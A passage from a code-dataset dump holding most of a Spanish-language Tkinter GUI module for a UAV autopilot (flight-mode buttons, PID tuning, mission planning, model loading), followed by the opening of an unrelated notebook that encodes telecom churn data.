self.Vision=LV.Vision(self.Qgc.Cola,self.Qgc.Modelo,self.Texto)\n self.hilo = Boton(self,LC.Mission)\n self.hilo.start()\n self.Mission.config(bg=\"green\")\n self.Mission_activo=1\n # Deshabilitar los botones de otros modos de vuelo\n self.GoTo.configure(state=DISABLED)\n self.Land.configure(state=DISABLED)\n self.Altitud.configure(state=DISABLED)\n self.Takeoff.configure(state=DISABLED)\n self.AutoLand.configure(state=DISABLED)\n self.Calibracion.configure(state=DISABLED)\n else:\n self.Mission.config(bg=\"white\")\n self.Mission_activo=0\n self.hilo.Parar()\n #Habilitar los botones de otros modos de vuelo\n self.GoTo.configure(state=NORMAL)\n self.Land.configure(state=NORMAL)\n self.Altitud.configure(state=NORMAL)\n self.Takeoff.configure(state=NORMAL)\n if self.Qgc.Modelo is not None:\n self.AutoLand.configure(state=NORMAL)\n self.Calibracion.configure(state=NORMAL)\n self.Plotear()\n if self.Verbose_options.Clean==1:\n self.Clean()\n\n def Actuar_Altitud(self):\n if self.Altitud_activo == 0:\n if self.metros.get()!=\"\":\n self.Altitud_vuelo=float(self.metros.get())\n else:\n self.Altitud_vuelo=600\n print('No hay altura')\n self.hilo = Boton(self, LC.Altitud)\n self.hilo.start()\n self.Altitud.config(bg=\"green\")\n self.Altitud_activo = 1\n # Deshabilitar los botones de otros modos de vuelo\n self.GoTo.configure(state=DISABLED)\n self.Land.configure(state=DISABLED)\n self.Mission.configure(state=DISABLED)\n self.Takeoff.configure(state=DISABLED)\n self.AutoLand.configure(state=DISABLED)\n self.Calibracion.configure(state=DISABLED)\n else:\n self.Altitud.config(bg=\"white\")\n self.Altitud_activo = 0\n self.hilo.Parar()\n # Habilitar los botones de otros modos de vuelo\n self.GoTo.configure(state=NORMAL)\n self.Land.configure(state=NORMAL)\n if self.Qgc.Mission is not None:\n self.Mission.configure(state=NORMAL)\n self.Takeoff.configure(state=NORMAL)\n if self.Qgc.Modelo is not None:\n self.AutoLand.configure(state=NORMAL)\n self.Calibracion.configure(state=NORMAL)\n self.Plotear()\n if self.Verbose_options.Clean==1:\n self.Clean()\n\n def Actuar_Land(self):\n if self.Land_activo == 0:\n self.hilo = Boton(self,LC.Land)\n self.hilo.start()\n self.Land.config(bg=\"green\")\n self.Land_activo = 1\n # Deshabilitar los botones de otros modos de vuelo\n self.GoTo.configure(state=DISABLED)\n self.Altitud.configure(state=DISABLED)\n self.Mission.configure(state=DISABLED)\n self.Takeoff.configure(state=DISABLED)\n self.AutoLand.configure(state=DISABLED)\n self.Calibracion.configure(state=DISABLED)\n else:\n self.Land.config(bg=\"white\")\n self.Land_activo = 0\n self.hilo.Parar()\n # Habilitar los botones de otros modos de vuelo\n self.GoTo.configure(state=NORMAL)\n self.Altitud.configure(state=NORMAL)\n if self.Qgc.Mission is not None:\n self.Mission.configure(state=NORMAL)\n self.Takeoff.configure(state=NORMAL)\n if self.Qgc.Modelo is not None:\n self.AutoLand.configure(state=NORMAL)\n self.Calibracion.configure(state=NORMAL)\n self.Plotear()\n if self.Verbose_options.Clean==1:\n self.Clean()\n\n def Actuar_Takeoff(self):\n if self.Takeoff_activo == 0:\n self.hilo = Boton(self, LC.Takeoff)\n self.hilo.start()\n self.Takeoff.config(bg=\"green\")\n self.Takeoff_activo = 1\n # Deshabilitar los botones de otros modos de vuelo\n self.GoTo.configure(state=DISABLED)\n self.Altitud.configure(state=DISABLED)\n self.Mission.configure(state=DISABLED)\n self.Land.configure(state=DISABLED)\n self.AutoLand.configure(state=DISABLED)\n self.Calibracion.configure(state=DISABLED)\n else:\n self.Takeoff.config(bg=\"white\")\n self.Takeoff_activo = 0\n self.hilo.Parar()\n # Habilitar los botones de otros modos de vuelo\n self.GoTo.configure(state=NORMAL)\n self.Altitud.configure(state=NORMAL)\n if self.Qgc.Mission is not None:\n self.Mission.configure(state=NORMAL)\n self.Land.configure(state=NORMAL)\n if self.Qgc.Modelo is not None:\n self.AutoLand.configure(state=NORMAL)\n self.Calibracion.configure(state=NORMAL)\n self.Plotear()\n if self.Verbose_options.Clean==1:\n self.Clean()\n\n def Actuar_GoTo(self):\n if self.GoTo_activo == 0:\n if self.Latitud.get()!=\"\" and self.Longitud.get()!=\"\":\n self.Waypoint.lat=float(self.Latitud.get())\n self.Waypoint.lon = float(self.Longitud.get())\n self.hilo = Boton(self, LC.Nav)\n self.hilo.start()\n self.GoTo.config(bg=\"green\")\n self.GoTo_activo = 1\n # Deshabilitar los botones de otros modos de vuelo\n self.Takeoff.configure(state=DISABLED)\n self.Altitud.configure(state=DISABLED)\n self.Mission.configure(state=DISABLED)\n self.Land.configure(state=DISABLED)\n self.AutoLand.configure(state=DISABLED)\n self.Calibracion.configure(state=DISABLED)\n else:\n self.GoTo.config(bg=\"white\")\n self.GoTo_activo = 0\n self.hilo.Parar()\n # Habilitar los botones de otros modos de vuelo\n self.Takeoff.configure(state=NORMAL)\n self.Altitud.configure(state=NORMAL)\n if self.Qgc.Mission is not None:\n self.Mission.configure(state=NORMAL)\n self.Land.configure(state=NORMAL)\n if self.Qgc.Modelo is not None:\n self.AutoLand.configure(state=NORMAL)\n self.Calibracion.configure(state=NORMAL)\n self.Plotear()\n if self.Verbose_options.Clean==1:\n self.Clean()\n\n def Actuar_Auto_Land(self):\n if self.AutoLand_activo == 0:\n if not self.Vision.is_alive():\n self.Vision=LV.Vision(self.Qgc.Cola,self.Qgc.Modelo,self.Texto)\n self.hilo = Boton(self, LC.Aterrizaje_autonomo)\n self.hilo.start()\n self.AutoLand.config(bg=\"green\")\n self.AutoLand_activo = 1\n # Deshabilitar los botones de otros modos de vuelo\n self.Takeoff.configure(state=DISABLED)\n self.Altitud.configure(state=DISABLED)\n self.Mission.configure(state=DISABLED)\n self.Land.configure(state=DISABLED)\n self.GoTo.configure(state=DISABLED)\n self.Calibracion.configure(state=DISABLED)\n else:\n self.AutoLand.config(bg=\"white\")\n self.AutoLand_activo = 0\n self.hilo.Parar()\n # Habilitar los botones de otros modos de vuelo\n self.Takeoff.configure(state=NORMAL)\n self.Altitud.configure(state=NORMAL)\n if self.Qgc.Mission is not None:\n self.Mission.configure(state=NORMAL)\n self.Land.configure(state=NORMAL)\n self.GoTo.configure(state=NORMAL)\n self.Calibracion.configure(state=NORMAL)\n self.Plotear()\n if self.Verbose_options.Clean==1:\n self.Clean()\n\n def Actuar_Calibracion(self):\n if self.Calibracion_activo == 0:\n Roll=0\n Pitch=0\n if self.Roll.get() != \"\":\n Roll=float(self.Roll.get())\n if self.Pitch.get() != \"\":\n Pitch=float(self.Pitch.get())\n self.hilo = Boton(self, LC.Bajo_nivel,Roll=Roll,Pitch=Pitch)\n self.hilo.start()\n self.Calibracion.config(bg=\"green\")\n self.Calibracion_activo = 1\n # Deshabilitar los botones de otros modos de vuelo\n self.Takeoff.configure(state=DISABLED)\n self.Altitud.configure(state=DISABLED)\n self.Mission.configure(state=DISABLED)\n self.Land.configure(state=DISABLED)\n self.GoTo.configure(state=DISABLED)\n self.AutoLand.configure(state=DISABLED)\n else:\n self.Calibracion.config(bg=\"white\")\n self.Calibracion_activo = 0\n self.hilo.Parar()\n # Habilitar los botones de otros modos de vuelo\n self.Takeoff.configure(state=NORMAL)\n self.Altitud.configure(state=NORMAL)\n if self.Qgc.Mission is not None:\n self.Mission.configure(state=NORMAL)\n self.Land.configure(state=NORMAL)\n self.GoTo.configure(state=NORMAL)\n if self.Qgc.Modelo is not None:\n self.AutoLand.configure(state=NORMAL)\n self.Plotear()\n if self.Verbose_options.Clean==1:\n self.Clean()\n\n def Plotear(self):\n if self.Verbose_options.Heading:\n Pagina_Plots(self.miframe,self.Qgc.Verbose.Plot_Heading(self))\n if self.Verbose_options.Altitud:\n Pagina_Plots(self.miframe, self.Qgc.Verbose.Plot_altitud(self))\n if self.Verbose_options.pitch:\n Pagina_Plots(self.miframe, self.Qgc.Verbose.Plot_Pitch(self))\n if self.Verbose_options.Roll:\n Pagina_Plots(self.miframe, self.Qgc.Verbose.Plot_Roll(self))\n if self.Verbose_options.Vel:\n Pagina_Plots(self.miframe, self.Qgc.Verbose.Plot_Vel(self))\n if self.Verbose_options.Posicion:\n Pagina_Plots(self.miframe, self.Qgc.Verbose.Plot_Posicion(self))\n\n\n\n\n def Clean(self):\n self.Qgc.Verbose=LC.Verbose_controls()\n\n\n# ------------------------------------------------\n# -----------------CLASES AUXILIARES--------------\n# ------------------------------------------------\n\nclass Boton(threading.Thread):\n def __init__(self,Main,Funcion,Roll=0,Pitch=0):\n threading.Thread.__init__(self)\n self.Main=Main\n self.Vivo=1\n self.Qgc=Main.Qgc\n self.Funcion=Funcion\n self.Altitud_vuelo=Main.Altitud_vuelo\n self.waypoint=Main.Waypoint\n self.Vision=Main.Vision\n self.pitch=Pitch\n self.Roll=Roll\n self.Hoja_Ruta=0\n def run(self):\n while (1):\n if self.Vivo:\n self.Funcion(self)\n else:\n break\n print('Hilo muerto')\n\n def Get_vivo(self):\n return self.Vivo\n\n def Parar(self):\n self.Vivo=0\n\n\nclass Verbose_options():\n def __init__(self):\n self.Heading=1\n self.Altitud=0\n self.Roll=0\n self.pitch=0\n self.Vel=0\n self.Posicion=0\n self.Heading_save=0\n self.Altitud_save=0\n self.Roll_save=0\n self.pitch_save=0\n self.Vel_save=0\n self.Posicion_save=0\n self.Clean=1\n\n\n\n# ------------------------------------------------\n# -----------------VENTANA PIDs-------------------\n# ------------------------------------------------\n\nclass Pagina_PIDs():\n def __init__(self,raiz,Qgc,Frame_principal):\n self.Qgc=Qgc\n self.Principal=Frame_principal\n miframe = Toplevel(raiz)\n miframe.title(\"PIDs Editor\")\n # ------------------------------------------------\n # -----------------Cajas texto--------------------\n # ------------------------------------------------\n self.kp = Entry(miframe)\n self.kp.grid(row=1, column=7)\n self.ki = Entry(miframe)\n self.ki.grid(row=2, column=7)\n self.kd = Entry(miframe)\n self.kd.grid(row=3, column=7)\n # ------------------------------------------------\n # -----------------Labels-------------------------\n # ------------------------------------------------\n Label(miframe, text=\"ki:\").grid(row=2, column=6)\n Label(miframe, text=\"kp:\").grid(row=1, column=6)\n Label(miframe, text=\"kd:\").grid(row=3, column=6)\n # ------------------------------------------------\n # -----------------Botones------------------------\n # ------------------------------------------------\n self.Export = Button(miframe, text=\" Export \",command=self.Exportar_PIDs)\n self.Export.grid(row=4, column=6)\n self.Save = Button(miframe, text=\" Save \",command=self.save)\n self.Save.grid(row=4, column=7)\n Button(miframe, text=\" + \",command=lambda:self.Sumar(0)).grid(row=1, column=8)\n Button(miframe, text=\" + \",command=lambda:self.Sumar(1)).grid(row=2, column=8)\n Button(miframe, text=\" + \",command=lambda:self.Sumar(2)).grid(row=3, column=8)\n Button(miframe, text=\" - \",command=lambda:self.Restar(0)).grid(row=1, column=5)\n Button(miframe, text=\" - \",command=lambda:self.Restar(1)).grid(row=2, column=5)\n Button(miframe, text=\" - \",command=lambda:self.Restar(2)).grid(row=3, column=5)\n # ------------------------------------------------\n # -----------------Combobox-----------------------\n # ------------------------------------------------\n OptionList=[\"Heading\",\"Rumbo\", \"Altitud\", \"Roll\", \"Pitch\", \"Velocidad\"]\n self.variable = StringVar(miframe)\n self.variable.set(OptionList[0])\n self.menu=OptionMenu(miframe, self.variable, *OptionList)\n self.menu.grid(row=0,column=0)\n self.set()\n self.variable.trace(\"w\", self.set)\n\n def Exportar_PIDs(self):\n Fichero = filedialog.askopenfilename(title=\"Abrir\", filetypes=((\"Fichero txt\", \"*.txt\"),))\n # try:\n Fichero = open(Fichero, \"w\")\n Fichero.write(str(self.Qgc.Control.PID_Heading.Kp)+\",\"+str(self.Qgc.Control.PID_Heading.Ki)+\",\"+str(self.Qgc.Control.PID_Heading.Kd)+\"\\n\")\n Fichero.write(str(self.Qgc.Control.PID_Altitud.Kp) + \",\" + str(self.Qgc.Control.PID_Altitud.Ki) + \",\" + str(self.Qgc.Control.PID_Altitud.Kd) + \"\\n\")\n Fichero.write(str(self.Qgc.Control.PID_Roll.Kp) + \",\" + str(self.Qgc.Control.PID_Roll.Ki) + \",\" + str(self.Qgc.Control.PID_Roll.Kd) + \"\\n\")\n Fichero.write(str(self.Qgc.Control.PID_Pitch.Kp) + \",\" + str(self.Qgc.Control.PID_Pitch.Ki) + \",\" + str(self.Qgc.Control.PID_Pitch.Kd) + \"\\n\")\n Fichero.write(str(self.Qgc.Control.PID_AirSpeed.Kp) + \",\" + str(self.Qgc.Control.PID_AirSpeed.Ki) + \",\" + str(self.Qgc.Control.PID_AirSpeed.Kd) + \"\\n\")\n print('Cargados')\n # except: # Si no hay mision se define una por defecto\n # print('No hay PIDs o no estan completos')\n\n def save(self):\n if self.variable.get()==\"Heading\":\n self.Principal.Qgc.Control.PID_Heading.Kp = float(self.kp.get())\n self.Principal.Qgc.Control.PID_Heading.Ki = float(self.ki.get())\n self.Principal.Qgc.Control.PID_Heading.Kd = float(self.kd.get())\n\n elif self.variable.get()==\"Rumbo\":\n self.Principal.Qgc.Control.PID_Heading_Rumbo.Kp = float(self.kp.get())\n self.Principal.Qgc.Control.PID_Heading_Rumbo.Ki = float(self.ki.get())\n self.Principal.Qgc.Control.PID_Heading_Rumbo.Kd = float(self.kd.get())\n\n elif self.variable.get()==\"Altitud\":\n self.Principal.Qgc.Control.PID_Altitud.Kp = float(self.kp.get())\n self.Principal.Qgc.Control.PID_Altitud.Ki = float(self.ki.get())\n self.Principal.Qgc.Control.PID_Altitud.Kd = float(self.kd.get())\n\n elif self.variable.get()==\"Roll\":\n self.Principal.Qgc.Control.PID_Roll.Kp = float(self.kp.get())\n self.Principal.Qgc.Control.PID_Roll.Ki = float(self.ki.get())\n self.Principal.Qgc.Control.PID_Roll.Kd = float(self.kd.get())\n\n elif self.variable.get()==\"Pitch\":\n self.Principal.Qgc.Control.PID_Pitch.Kp = float(self.kp.get())\n self.Principal.Qgc.Control.PID_Pitch.Ki = float(self.ki.get())\n self.Principal.Qgc.Control.PID_Pitch.Kd = float(self.kd.get())\n\n else:\n self.Principal.Qgc.Control.PID_AirSpeed.Kp = float(self.kp.get())\n self.Principal.Qgc.Control.PID_AirSpeed.Ki = float(self.ki.get())\n self.Principal.Qgc.Control.PID_AirSpeed.Kd = float(self.kd.get())\n\n def set(self,*args):\n self.kp.delete(0, 50)\n self.ki.delete(0, 50)\n self.kd.delete(0, 50)\n if self.variable.get()==\"Heading\":\n self.kp.insert(0,str(self.Principal.Qgc.Control.PID_Heading.Kp))\n self.ki.insert(0,str(self.Principal.Qgc.Control.PID_Heading.Ki))\n self.kd.insert(0,str(self.Principal.Qgc.Control.PID_Heading.Kd))\n\n elif self.variable.get()==\"Rumbo\":\n self.kp.insert(0,str(self.Principal.Qgc.Control.PID_Heading_Rumbo.Kp))\n self.ki.insert(0,str(self.Principal.Qgc.Control.PID_Heading_Rumbo.Ki))\n self.kd.insert(0,str(self.Principal.Qgc.Control.PID_Heading_Rumbo.Kd))\n\n elif self.variable.get()==\"Altitud\":\n self.kp.insert(0,str(self.Principal.Qgc.Control.PID_Altitud.Kp))\n self.ki.insert(0,str(self.Principal.Qgc.Control.PID_Altitud.Ki))\n self.kd.insert(0,str(self.Principal.Qgc.Control.PID_Altitud.Kd))\n\n elif self.variable.get()==\"Roll\":\n self.kp.insert(0,str(self.Principal.Qgc.Control.PID_Roll.Kp))\n self.ki.insert(0,str(self.Principal.Qgc.Control.PID_Roll.Ki))\n self.kd.insert(0,str(self.Principal.Qgc.Control.PID_Roll.Kd))\n\n elif self.variable.get()==\"Pitch\":\n self.kp.insert (0,str(self.Principal.Qgc.Control.PID_Pitch.Kp))\n self.ki.insert (0,str(self.Principal.Qgc.Control.PID_Pitch.Ki))\n self.kd.insert (0,str(self.Principal.Qgc.Control.PID_Pitch.Kd))\n\n else:\n self.kp.insert (0,str(self.Principal.Qgc.Control.PID_AirSpeed.Kp))\n self.ki.insert (0,str(self.Principal.Qgc.Control.PID_AirSpeed.Ki))\n self.kd.insert (0,str(self.Principal.Qgc.Control.PID_AirSpeed.Kd))\n\n def Sumar(self,opcion):\n paso=0.5\n if opcion==0:\n Valor_kp=float(self.kp.get())+paso\n self.kp.delete(0, 50)\n self.kp.insert (0,str(Valor_kp))\n elif opcion==1:\n Valor_ki = float(self.ki.get()) + paso\n self.ki.delete(0, 50)\n self.ki.insert (0,str(Valor_ki))\n else:\n Valor_kd = float(self.kd.get()) + paso\n self.kd.delete(0, 50)\n self.kd.insert (0,str(Valor_kd))\n\n def Restar(self,opcion):\n paso=0.5\n if opcion==0:\n Valor_kp=float(self.kp.get())-paso\n self.kp.delete(0, 50)\n self.kp.insert (0,str(Valor_kp))\n elif opcion==1:\n Valor_ki = float(self.ki.get()) - paso\n self.ki.delete(0, 50)\n self.ki.insert (0,str(Valor_ki))\n else:\n Valor_kd = float(self.kd.get()) - paso\n self.kd.delete(0, 50)\n self.kd.insert (0,str(Valor_kd))\n\n\n\nclass Pagina_Mission():\n def __init__(self,raiz,Qgc,Frame_principal):\n self.Qgc=Qgc\n self.Principal=Frame_principal\n miframe = Toplevel(raiz)\n miframe.title(\"Mission Creator\")\n\n # ------------------------------------------------\n # -----------------Cajas texto--------------------\n # ------------------------------------------------\n self.Metros = Entry(miframe)\n self.Metros.grid(row=1, column=7)\n self.Latitud = Entry(miframe)\n self.Latitud.grid(row=2, column=7)\n self.Longitud = Entry(miframe)\n self.Longitud.grid(row=3, column=7)\n self.Velocidad = Entry(miframe)\n self.Velocidad.grid(row=4, column=7)\n self.FM = Entry(miframe)\n self.FM.grid(row=5, column=7)\n # ------------------------------------------------\n # -----------------Labels-------------------------\n # ------------------------------------------------\n Label(miframe, text=\"Metros:\").grid(row=2, column=6)\n Label(miframe, text=\"Latitud:\").grid(row=1, column=6)\n Label(miframe, text=\"Longitud:\").grid(row=3, column=6)\n Label(miframe, text=\"Velocidad:\").grid(row=4, column=6)\n Label(miframe, text=\"FM:\").grid(row=5, column=6)\n # ------------------------------------------------\n # -----------------Botones------------------------\n # ------------------------------------------------\n self.Save = Button(miframe, text=\" Save \",command=self.save,bg='white')\n self.Save.grid(row=6, column=6)\n self.Add = Button(miframe, text=\" Add \",command=self.add,bg='white')\n self.Add.grid(row=6, column=7)\n self.Delete = Button(miframe, text=\" Delete \",command=self.delete,bg='white')\n self.Delete.grid(row=6, column=8)\n # ------------------------------------------------\n # -----------------Texto--------------------------\n # ------------------------------------------------\n self.Texto=Text(miframe)\n self.Texto.config(width=20, height=10)\n self.Texto.grid(row=7,column=7)\n def save(self):\n self.Principal.Qgc=self.Qgc\n self.Principal.Mission.configure(state=NORMAL)\n\n def add(self):\n if self.Metros.get()!=\"\" and self.Latitud.get()!=\"\" and self.Longitud.get()!=\"\"and self.Velocidad.get()!=\"\"and self.FM.get()!=\"\":\n self.Qgc.Mission.append(LC.Waypoint(self.Latitud.get(),self.Longitud.get(),self.Metros.get(),self.Velocidad.get(),self.FM.get()))\n self.Texto.insert(\"insert\", str(self.Latitud.get())+str(',')+str(self.Longitud.get())+str(',')+str(self.Metros.get())+str(',')+str(self.Velocidad.get())+str(',')+str(self.FM.get())+'\\n')\n def delete(self):\n self.Qgc.Mission=[]\n self.Texto.delete(1.0,END)\n\n\nclass Pagina_Verbose():\n def __init__(self,raiz,Frame_principal):\n self.Principal=Frame_principal\n miframe = Toplevel(raiz)\n miframe.title(\"Verbose options\")\n\n\n # ------------------------------------------------\n # -----------------Variables-------------------------\n # ------------------------------------------------\n self.Heading=IntVar()\n self.Altitud=IntVar()\n self.Roll=IntVar()\n self.pitch=IntVar()\n self.Vel=IntVar()\n self.Posicion = IntVar()\n self.Heading_save=IntVar()\n self.Altitud_save=IntVar()\n self.Roll_save=IntVar()\n self.pitch_save=IntVar()\n self.Vel_save=IntVar()\n self.Posicion_save = IntVar()\n self.Clean=IntVar()\n\n # ------------------------------------------------\n # -----------------ChecButtons--------------------\n # ------------------------------------------------\n self.Check_Heading=Checkbutton(miframe, text=\"Heading\", variable=self.Heading, onvalue=1,offvalue=0)\n self.Check_Heading.pack()\n self.Check_Altitud=Checkbutton(miframe, text=\"Altitud\", variable=self.Altitud, onvalue=1,offvalue=0)\n self.Check_Altitud.pack()\n self.Check_Roll=Checkbutton(miframe, text=\"Roll\", variable=self.Roll, onvalue=1,offvalue=0)\n self.Check_Roll.pack()\n self.Check_Pitch=Checkbutton(miframe, text=\"Pitch\", variable=self.pitch, onvalue=1,offvalue=0)\n self.Check_Pitch.pack()\n self.Check_Vel=Checkbutton(miframe, text=\"Vel\", variable=self.Vel, onvalue=1,offvalue=0)\n self.Check_Vel.pack()\n self.Check_Posicion=Checkbutton(miframe, text=\"Posicion\", variable=self.Posicion, onvalue=1,offvalue=0)\n self.Check_Posicion.pack()\n self.Check_Heading_save=Checkbutton(miframe, text=\"Heading save\", variable=self.Heading_save, onvalue=1,offvalue=0)\n self.Check_Heading_save.pack()\n self.Check_Altitud_save=Checkbutton(miframe, text=\"Altitud save\", variable=self.Altitud_save, onvalue=1,offvalue=0)\n self.Check_Altitud_save.pack()\n self.Check_Roll_save=Checkbutton(miframe, text=\"Roll save\", variable=self.Roll_save, onvalue=1,offvalue=0)\n self.Check_Roll_save.pack()\n self.Check_Pitch_save=Checkbutton(miframe, text=\"Pitch save\", variable=self.pitch_save, onvalue=1,offvalue=0)\n self.Check_Pitch_save.pack()\n self.Check_Vel_save=Checkbutton(miframe, text=\"Vel save\", variable=self.Vel_save, onvalue=1,offvalue=0)\n self.Check_Vel_save.pack()\n self.Check_Posicion_save=Checkbutton(miframe, text=\"Posicion save\", variable=self.Posicion_save, onvalue=1,offvalue=0)\n self.Check_Posicion_save.pack()\n self.Check_Clean=Checkbutton(miframe, text=\"Clean\", variable=self.Clean, onvalue=1,offvalue=0)\n self.Check_Clean.pack()\n # ------------------------------------------------\n # -----------------Botones------------------------\n # ------------------------------------------------\n self.Save = Button(miframe, text=\" Save \",command=self.save,bg='white')\n self.Save.pack()\n self.set()\n\n def save(self):\n self.Principal.Verbose_options.Heading = self.Heading.get()\n self.Principal.Verbose_options.Altitud = self.Altitud.get()\n self.Principal.Verbose_options.Roll = self.Roll.get()\n self.Principal.Verbose_options.pitch = self.pitch.get()\n self.Principal.Verbose_options.Vel = self.Vel.get()\n self.Principal.Verbose_options.Posicion = self.Posicion.get()\n self.Principal.Verbose_options.Heading_save = self.Heading_save.get()\n self.Principal.Verbose_options.Altitud_save = self.Altitud_save.get()\n self.Principal.Verbose_options.Roll_save = self.Roll_save.get()\n self.Principal.Verbose_options.pitch_save = self.pitch_save.get()\n self.Principal.Verbose_options.Vel_save = self.Vel_save.get()\n self.Principal.Verbose_options.Posicion_save = self.Posicion_save.get()\n self.Principal.Verbose_options.Clean = self.Clean.get()\n\n def set(self):\n self.Heading.set(self.Principal.Verbose_options.Heading)\n self.Altitud.set(self.Principal.Verbose_options.Altitud)\n self.Roll.set(self.Principal.Verbose_options.Roll)\n self.pitch.set(self.Principal.Verbose_options.pitch)\n self.Vel.set(self.Principal.Verbose_options.Vel)\n self.Posicion.set(self.Principal.Verbose_options.Posicion)\n self.Heading_save.set(self.Principal.Verbose_options.Heading_save)\n self.Altitud_save.set(self.Principal.Verbose_options.Altitud_save)\n self.Roll_save.set(self.Principal.Verbose_options.Roll_save)\n self.pitch_save.set(self.Principal.Verbose_options.pitch_save)\n self.Vel_save.set(self.Principal.Verbose_options.Vel_save)\n self.Posicion_save.set(self.Principal.Verbose_options.Posicion_save)\n self.Clean.set(self.Principal.Verbose_options.Clean)\n\nclass Pagina_Plots():\n def __init__(self,raiz,fig):\n miframe = Toplevel(raiz)\n miframe.title(\"Plots\")\n if fig is not None:\n canvas = FigureCanvasTkAgg(fig, master=miframe)\n plot_widget = canvas.get_tk_widget()\n plot_widget.pack(side=TOP, fill=BOTH, expand=1)\n else:\n miframe.destroy()\n\n\nclass Pagina_Comm():\n def __init__(self,raiz,main):\n miframe = Toplevel(raiz)\n miframe.title(\"Config\")\n self.main=main\n # ------------------------------------------------\n # -----------------Variables-------------------------\n # ------------------------------------------------\n self.Port_send=StringVar()\n self.Port_recv=StringVar()\n self.IP=StringVar()\n # ------------------------------------------------\n # -----------------Labels-------------------------\n # ------------------------------------------------\n Label(miframe,text=\"Port_send: \").grid(row=1, column=1)\n Label(miframe,text=\"Port_recv: \").grid(row=2, column=1)\n Label(miframe,text=\"IP: \").grid(row=3, column=1)\n # ------------------------------------------------\n # -----------------Entry-------------------------\n # ------------------------------------------------\n self.Port_send_entry = Entry(miframe,textvariable=self.Port_send)\n self.Port_send_entry.grid(row=1, column=2)\n self.Port_recv_entry = Entry(miframe,textvariable=self.Port_recv)\n self.Port_recv_entry.grid(row=2, column=2)\n self.IP_entry = Entry(miframe,textvariable=self.IP)\n self.IP_entry.grid(row=3, column=2)\n # ------------------------------------------------\n # -----------------Botones------------------------\n # ------------------------------------------------\n self.Save = Button(miframe, text=\" Save \", command=self.save, bg='white')\n self.Save.grid(row=4, column=1)\n self.set()\n\n def save(self):\n self.main.Qgc.PortAdress_send = (self.IP.get(),int(self.Port_send.get()))\n self.main.Qgc.PortAdress_recv = (self.IP.get(),int(self.Port_recv.get()))\n print(self.main.Qgc.PortAdress_recv)\n self.main.Qgc.sock.bind(self.main.Qgc.PortAdress_recv)\n\n def set(self):\n recv = str(self.main.Qgc.PortAdress_recv).split(\",\")\n send = str(self.main.Qgc.PortAdress_send).split(\",\")\n Port_send=send[1].rstrip(')')\n Port_recv=recv[1].rstrip(')')\n Ip=recv[0].lstrip('(')\n self.Port_send.set(Port_send)\n self.Port_recv.set(Port_recv)\n self.IP.set(Ip)\n\nclass Pagina_IA():\n def __init__(self,raiz,main):\n miframe = Toplevel(raiz)\n miframe.title(\"Config\")\n self.main=main\n # ------------------------------------------------\n # -----------------Botones------------------------\n # ------------------------------------------------\n self.Load_IA = Button(miframe, text=\" Load IA \", command=self.Load, bg='white')\n self.Load_IA.grid(row=1, column=1)\n self.Load_IA_default = Button(miframe, text=\" Load IA Default \", command=self.Load_default, bg='white')\n self.Load_IA_default.grid(row=2, column=1)\n\n\n def Load(self):\n Modelo = filedialog.askopenfilename(title=\"Abrir modelo\")\n try:\n cnn = LC.load_model(Modelo)\n self.main.Qgc.Modelo=cnn\n self.main.AutoLand.configure(state=NORMAL)\n self.main.Vision = LV.Vision(self.main.Qgc.Cola, self.main.Qgc.Modelo, self.main.Texto)\n print('Cargado')\n except:\n print('Fallo al cargar el modelo')\n self.main.AutoLand.configure(state=DISABLED)\n\n def Load_default(self):\n Modelo = r'C:\\Users\\Juatarto\\Desktop\\TFM\\Arquitecturas\\Test\\Epoca_10\\Modelo_Capas_6_RGB_Epocas_10_Neuronas_256_Filtros_32_relu.h5'\n try:\n cnn = load_model(Modelo)\n self.main.Qgc.Modelo=cnn\n # self.main.Qgc.Modelo._make_predict_function() #IMPORTANTISIMO esto genera el grafo en la GPU para evitar que la primera vez que se llama a predict() sea muy lento\n self.main.Vision = LV.Vision(self.main.Qgc.Cola, self.main.Qgc.Modelo, self.main.Texto)\n self.main.AutoLand.configure(state=NORMAL)\n if self.main.Qgc.Mission is not None:\n self.main.Mission.configure(state=NORMAL)\n self.main.Texto.insert(\"insert\", \"Modelo IA cargado correctamente\\n\")\n print('Cargado')\n except:\n print('Fallo al cargar el modelo')\n self.main.AutoLand.configure(state=DISABLED)\n\n\nclass Hoja_ruta():\n def __init__(self,raiz,Mission):\n self.miframe = Toplevel(raiz)\n self.Mision=Mission\n self.Labels = []\n self.label=Label(self.miframe, text=\"Plan de vuelo\").grid(row=0, column=1)\n self.Init()\n\n def Init(self):\n x=1\n for waypoint in self.Mision:\n self.Printear(waypoint,x)\n x+=1\n\n def Printear(self,waypoint,numero):\n if waypoint.Flight_mode==0:\n Text=\"Despegue\"\n elif waypoint.Flight_mode==1:\n Text=\"Navegacion\"\n elif waypoint.Flight_mode==2:\n Text=\"Aterrizaje autonomo\"\n elif waypoint.Flight_mode==3:\n Text=\"Aterrizaje\"\n self.Labels.append(Label(self.miframe, text=Text,borderwidth=2, relief=\"groove\"))\n self.Labels[numero-1].grid(row=numero, column=1)\n\n def Actualizar_waypoint(self,numero,Fin=False):\n if Fin==True:\n Label = self.Labels[numero - 1]\n Label.config(bg=\"green\")\n else:\n Label=self.Labels[numero]\n Label.config(bg=\"orange\")\n if numero>0:\n Label = self.Labels[numero-1]\n Label.config(bg=\"green\")\n def salir(self):\n self.miframe.destroy()\n","sub_path":"Autopiloto_Def/Libreria_GUI.py","file_name":"Libreria_GUI.py","file_ext":"py","file_size_in_byte":40841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"235269205","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # PREDICTING TELECOM CHURN\n\n# In[42]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\n# In[43]:\n\n\n# Importing the dataset\ndataset = pd.read_csv('/Users/vandy/Desktop/WA_Fn-UseC_-Telco-Customer-Churn.csv')\n#X = dataset.iloc[:, [2,3]].values\n#y = dataset.iloc[:, 20].values\ndataset.head()\n\n\n# In[44]:\n\n\ndataset['newMonthlyCharges']=[1 if x>43 else 0 for x in dataset['MonthlyCharges']]\n\n\n# In[45]:\n\n\ndataset\n\n\n# In[46]:\n\n\n# Import label encoder \nfrom sklearn import preprocessing \nlabel_encoder = preprocessing.LabelEncoder()\ndataset['MultipleLines']= label_encoder.fit_transform(dataset['MultipleLines']) \ndataset['MultipleLines'].unique() \n\ndataset['InternetService']= label_encoder.fit_transform(dataset['InternetService']) \ndataset['InternetService'].unique() \n\ndataset['gender']= label_encoder.fit_transform(dataset['gender']) \ndataset['gender'].unique() \n\ndataset['Partner']= label_encoder.fit_transform(dataset['Partner']) 